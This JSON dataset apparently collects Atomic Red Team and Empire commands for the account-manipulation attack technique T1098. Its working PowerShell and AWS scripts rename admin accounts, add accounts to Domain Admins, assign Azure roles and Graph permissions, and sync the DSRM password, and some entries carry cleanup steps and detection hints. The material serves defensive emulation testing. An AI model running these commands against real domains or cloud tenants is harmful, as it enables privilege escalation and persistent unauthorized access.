Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"SuperSP\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not 
found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"Reader\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"Azure subscription 1\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nNew-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"jonh@contoso.com\", 
$Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id 
$reqPermission.Id\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"p4sswd\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD 
App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"test_app\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"test_app\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('#{application_permission}')\n\n$reqPermission = $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App 
permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$aadApplication = New-AzureADApplication -DisplayName \"#{application_name}\"\n$servicePrincipal = New-AzureADServicePrincipal -AppId $aadApplication.AppId\n#$aadApplication = Get-AzureADApplication | Where-Object {$_.DisplayName -eq \"#{application_name}\"}\n\n#Get Service Principal of Microsoft Graph Resource API \n$graphSP = Get-AzureADServicePrincipal -All $true | Where-Object {$_.DisplayName -eq \"Microsoft Graph\"}\n\n#Initialize RequiredResourceAccess for Microsoft Graph Resource API \n$requiredGraphAccess = New-Object Microsoft.Open.AzureAD.Model.RequiredResourceAccess\n$requiredGraphAccess.ResourceAppId = $graphSP.AppId\n$requiredGraphAccess.ResourceAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.ResourceAccess]\n\n#Set Application Permissions\n$ApplicationPermissions = @('DirectoryRecommendations.Read.All')\n\n$reqPermission 
= $graphSP.AppRoles | Where-Object {$_.Value -eq $ApplicationPermissions}\nif($reqPermission)\n{\n$resourceAccess = New-Object Microsoft.Open.AzureAD.Model.ResourceAccess\n$resourceAccess.Type = \"Role\"\n$resourceAccess.Id = $reqPermission.Id \n#Add required app permission\n$requiredGraphAccess.ResourceAccess.Add($resourceAccess)\n}\nelse\n{\nWrite-Host \"App permission $permission not found in the Graph Resource API\" -ForegroundColor Red\n}\n\n#Add required resource accesses\n$requiredResourcesAccess = New-Object System.Collections.Generic.List[Microsoft.Open.AzureAD.Model.RequiredResourceAccess]\n$requiredResourcesAccess.Add($requiredGraphAccess)\n\n#Set permissions in existing Azure AD App\nSet-AzureADApplication -ObjectId $aadApplication.ObjectId -RequiredResourceAccess $requiredResourcesAccess\n\n$servicePrincipal = Get-AzureADServicePrincipal -All $true | Where-Object {$_.AppId -eq $aadApplication.AppId}\n\nNew-AzureADServiceAppRoleAssignment -ObjectId $servicePrincipal.ObjectId -PrincipalId $servicePrincipal.ObjectId -ResourceId $graphSP.ObjectId -Id $reqPermission.Id\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "ntdsutil \"set dsrm password\" \"sync from domain account %username%\" \"q\" \"q\"\n", + "source": "atomics/T1098/T1098.yaml", + "name": "Atomic Red Team Test - Account Manipulation" + }, + { + "command": "powershell/management/honeyhash", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/set_ad_object", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1098", + "display_name": "Account Manipulation", + "atomic_tests": [ + { + "name": "Admin Account Manipulate", + 
"auto_generated_guid": "5598f7cb-cf43-455e-883a-f6008c5d46af", + "description": "Manipulate Admin Account Name\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$x = Get-Random -Minimum 2 -Maximum 9999\n$y = Get-Random -Minimum 2 -Maximum 9999\n$z = Get-Random -Minimum 2 -Maximum 9999\n$w = Get-Random -Minimum 2 -Maximum 9999\nWrite-Host HaHa_$x$y$z\n\n$fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match \"User\" -and $_.PrincipalSource -match \"Local\"} | Select Name\n\nforeach($member in $fmm) {\n if($member -like \"*Administrator*\") {\n $account = $member.Name -replace \".+\\\\\\\",\"\" # strip computername\\\n $originalDescription = (Get-LocalUser -Name $account).Description\n Set-LocalUser -Name $account -Description \"atr:$account;$originalDescription\".Substring(0,48) # Keep original name in description\n Rename-LocalUser -Name $account -NewName \"HaHa_$x$y$z\" # Required due to length limitation\n Write-Host \"Successfully Renamed $account Account on \" $Env:COMPUTERNAME\n }\n }\n", + "cleanup_command": "$list = Get-LocalUser |?{$_.Description -like \"atr:*\"}\nforeach($u in $list) {\n $u.Description -match \"atr:(?[^;]+);(?.*)\"\n Set-LocalUser -Name $u.Name -Description $Matches.Description\n Rename-LocalUser -Name $u.Name -NewName $Matches.Name\n Write-Host \"Successfully Reverted Account $($u.Name) to $($Matches.Name) on \" $Env:COMPUTERNAME\n}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Domain Account and Group Manipulate", + "auto_generated_guid": "a55a22e9-a3d3-42ce-bd48-2653adb8f7a9", + "description": "Create a random atr-nnnnnnnn account and add it to a domain group (by default, Domain Admins). \n\nThe quickest way to run it is against a domain controller, using `-Session` of `Invoke-AtomicTest`. Alternatively,\nyou need to install PS Module ActiveDirectory (in prereqs) and run the script with appropriare AD privileges to \ncreate the user and alter the group. 
Automatic installation of the dependency requires an elevated session, \nand is unlikely to work with Powershell Core (untested).\n\nIf you consider running this test against a production Active Directory, the good practise is to create a dedicated\nservice account whose delegation is given onto a dedicated OU for user creation and deletion, as well as delegated\nas group manager of the target group.\n\nExample: `Invoke-AtomicTest -Session $session 'T1098' -TestNames \"Domain Account and Group Manipulate\" -InputArgs @{\"group\" = \"DNSAdmins\" }`\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "account_prefix": { + "description": "Prefix string of the random username (by default, atr-). Because the cleanup deletes such account based on\na match `(&(samaccountname=#{account_prefix}-*)(givenName=Test))`, if you are to change it, be careful.\n", + "type": "String", + "default": "atr-" + }, + "group": { + "description": "Name of the group to alter", + "type": "String", + "default": "Domain Admins" + }, + "create_args": { + "description": "Additional string appended to New-ADUser call", + "type": "String", + "default": "" + } + }, + "dependencies": [ + { + "description": "PS Module ActiveDirectory\n", + "prereq_command": "Try {\n Import-Module ActiveDirectory -ErrorAction Stop | Out-Null\n exit 0\n} \nCatch {\n exit 1\n}\n", + "get_prereq_command": "if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {\n Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online\n} else {\n Install-WindowsFeature RSAT-AD-PowerShell\n}\n" + } + ], + "executor": { + "command": "$x = Get-Random -Minimum 2 -Maximum 99\n$y = Get-Random -Minimum 2 -Maximum 99\n$z = Get-Random -Minimum 2 -Maximum 99\n$w = Get-Random -Minimum 2 -Maximum 99\n\nImport-Module ActiveDirectory\n$account = \"#{account_prefix}-$x$y$z\"\nNew-ADUser -Name $account -GivenName \"Test\" -DisplayName $account -SamAccountName $account 
-Surname $account -Enabled:$False #{create_args}\nAdd-ADGroupMember \"#{group}\" $account\n", + "cleanup_command": "Get-ADUser -LDAPFilter \"(&(samaccountname=#{account_prefix}-*)(givenName=Test))\" | Remove-ADUser -Confirm:$False\n", + "name": "powershell" + } + }, + { + "name": "AWS - Create a group and add a user to that group", + "auto_generated_guid": "8822c3b0-d9f9-4daf-a043-49f110a31122", + "description": "Adversaries create AWS group, add users to specific to that group to elevate their privilieges to gain more accesss\n", + "supported_platforms": [ + "iaas:aws" + ], + "input_arguments": { + "username": { + "description": "Name of the AWS group to create", + "type": "String", + "default": "atomicredteam" + } + }, + "dependencies": [ + { + "description": "Check if the user exists, we can only add a user to a group if the user exists.\n", + "prereq_command": "aws iam list-users | grep #{username}\n", + "get_prereq_command": "echo Please run atomic test T1136.003, before running this atomic test\n" + } + ], + "executor": { + "command": "aws iam create-group --group-name #{username}\naws iam add-user-to-group --user-name #{username} --group-name #{username}\n", + "cleanup_command": "aws iam remove-user-from-group --user-name #{username} --group-name #{username}\naws iam delete-group --group-name #{username}\n", + "name": "sh" + } + }, + { + "name": "Azure - adding user to Azure AD role", + "auto_generated_guid": "0e65ae27-5385-46b4-98ac-607a8ee82261", + "description": "The adversarie want to add user to some Azure AD role. Threat actor \nmay be interested primarily in highly privileged roles, e.g. 
Global Administrator, Application Administrator, \nPrivileged authentication administrator (this role can reset Global Administrator password!).\nBy default, the role Global Reader is assigned to service principal in this test.\n\nThe account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.\n\nDetection hint - check Activity \"Add member to role\" in Azure AD Audit Logs. In targer you will also see User as a type.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "user_principal_name": { + "description": "Name of the targeted user (user principal)", + "type": "String", + "default": "SuperUser" + }, + "role_name": { + "description": "Name of the targed Azure AD role", + "type": "String", + "default": "Global Reader" + } + }, + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId 
-RefObjectId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was added to $($role.DisplayName) role\"\n", + "cleanup_command": "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential -ErrorAction Ignore\n\n$user = Get-AzureADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nRemove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId\nWrite-Host \"User $($user.DisplayName) was removed from $($role.DisplayName) role\"\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Azure - adding service principal to Azure AD role", + "auto_generated_guid": "92c40b3f-c406-4d1f-8d2b-c039bf5009e4", + "description": "The adversarie want to add service principal to some Azure AD role. Threat actor \nmay be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, \nPrivileged authentication administrator (this role can reset Global Administrator password!).\nBy default, the role Global Reader is assigned to service principal in this test.\n\nThe account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.\n\nDetection hint - check Activity \"Add member to role\" in Azure AD Audit Logs. 
In targer you will also see Service Principal as a type.\n", + "supported_platforms": [ + "azure-ad" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "service_principal_name": { + "description": "Name of the service principal", + "type": "String", + "default": "SuperSP" + }, + "role_name": { + "description": "Name of the targed Azure AD role", + "type": "String", + "default": "Global Reader" + } + }, + "dependencies": [ + { + "description": "AzureAD module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name AzureAD -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name AzureAD\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\nAdd-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was added to $($role.DisplayName)\"\n", + "cleanup_command": "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzureAD -Credential $Credential 
-ErrorAction Ignore\n\n$sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nRemove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId\nWrite-Host \"Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role\"\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Azure - adding user to Azure role in subscription", + "auto_generated_guid": "1a94b3fc-b080-450a-b3d8-6d9b57b472ea", + "description": "The adversarie want to add user to some Azure role, also called Azure resource role. Threat actor \nmay be interested primarily in highly privileged roles, e.g. Owner, Contributor.\nBy default, the role Reader is assigned to user in this test.\n\nNew-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.\n\nThe account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write \n(e.g. 
such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All \nand Microsoft Graph Directory.Read.All permissions.\n\nDetection hint - check Operation Name \"Create role assignment\" in subscriptions Activity Logs.\n", + "supported_platforms": [ + "iaas:azure" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "user_principal_name": { + "description": "Name of the targeted user (user principal)", + "type": "String", + "default": "SuperUser" + }, + "role_name": { + "description": "Name of the targed Azure role", + "type": "String", + "default": "Reader" + }, + "subscription": { + "description": "Name of the targed subscription", + "type": "String", + "default": "Azure subscription 1" + } + }, + "dependencies": [ + { + "description": "Az.Resources module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name Az.Resources -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit 
}\n\nNew-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "cleanup_command": "Import-Module -Name AzureAD -ErrorAction Ignore\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential -ErrorAction Ignore\n\n$user = Get-AzADUser | where-object {$_.DisplayName -eq \"#{user_principal_name}\"}\nif ($user -eq $null) { Write-Warning \"User not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"}\nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not found\"; exit }\n\nRemove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription\nWrite-Host \"Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)\"\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Azure - adding service principal to Azure role in subscription", + "auto_generated_guid": "c8f4bc29-a151-48da-b3be-4680af56f404", + "description": "The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor \nmay be interested primarily in highly privileged roles, e.g. Owner, Contributor.\nBy default, the role Reader is assigned to service principal in this test.\n\nNew-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.\n\nThe account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write \n(e.g. 
such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All \nand Microsoft Graph Directory.Read.All permissions.\n\nDetection hint - check Operation Name \"Create role assignment\" in subscriptions Activity Logs.\n", + "supported_platforms": [ + "iaas:azure" + ], + "input_arguments": { + "username": { + "description": "Azure AD username", + "type": "String", + "default": "jonh@contoso.com" + }, + "password": { + "description": "Azure AD password", + "type": "String", + "default": "p4sswd" + }, + "service_principal_name": { + "description": "Name of the service principal", + "type": "String", + "default": "SuperSP" + }, + "role_name": { + "description": "Name of the targed Azure role", + "type": "String", + "default": "Reader" + }, + "subscription": { + "description": "Name of the targed subscription", + "type": "String", + "default": "Azure subscription 1" + } + }, + "dependencies": [ + { + "description": "Az.Resources module must be installed.\n", + "prereq_command": "try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}\n", + "get_prereq_command": "Install-Module -Name Az.Resources -Force\n" + } + ], + "executor": { + "command": "Import-Module -Name Az.Resources\n$PWord = ConvertTo-SecureString -String \"#{password}\" -AsPlainText -Force\n$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"#{username}\", $Pword\nConnect-AzAccount -Credential $Credential\n\n$sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq \"#{service_principal_name}\"}\nif ($sp -eq $null) { Write-Warning \"Service Principal not found\"; exit }\n$subscription = Get-AzSubscription | where-object {$_.Name -eq \"#{subscription}\"} \nif ($subscription -eq $null) { Write-Warning \"Subscription not found\"; exit }\n$role = Get-AzRoleDefinition | where-object {$_.Name -eq \"#{role_name}\"}\nif ($role -eq $null) { Write-Warning \"Role not 
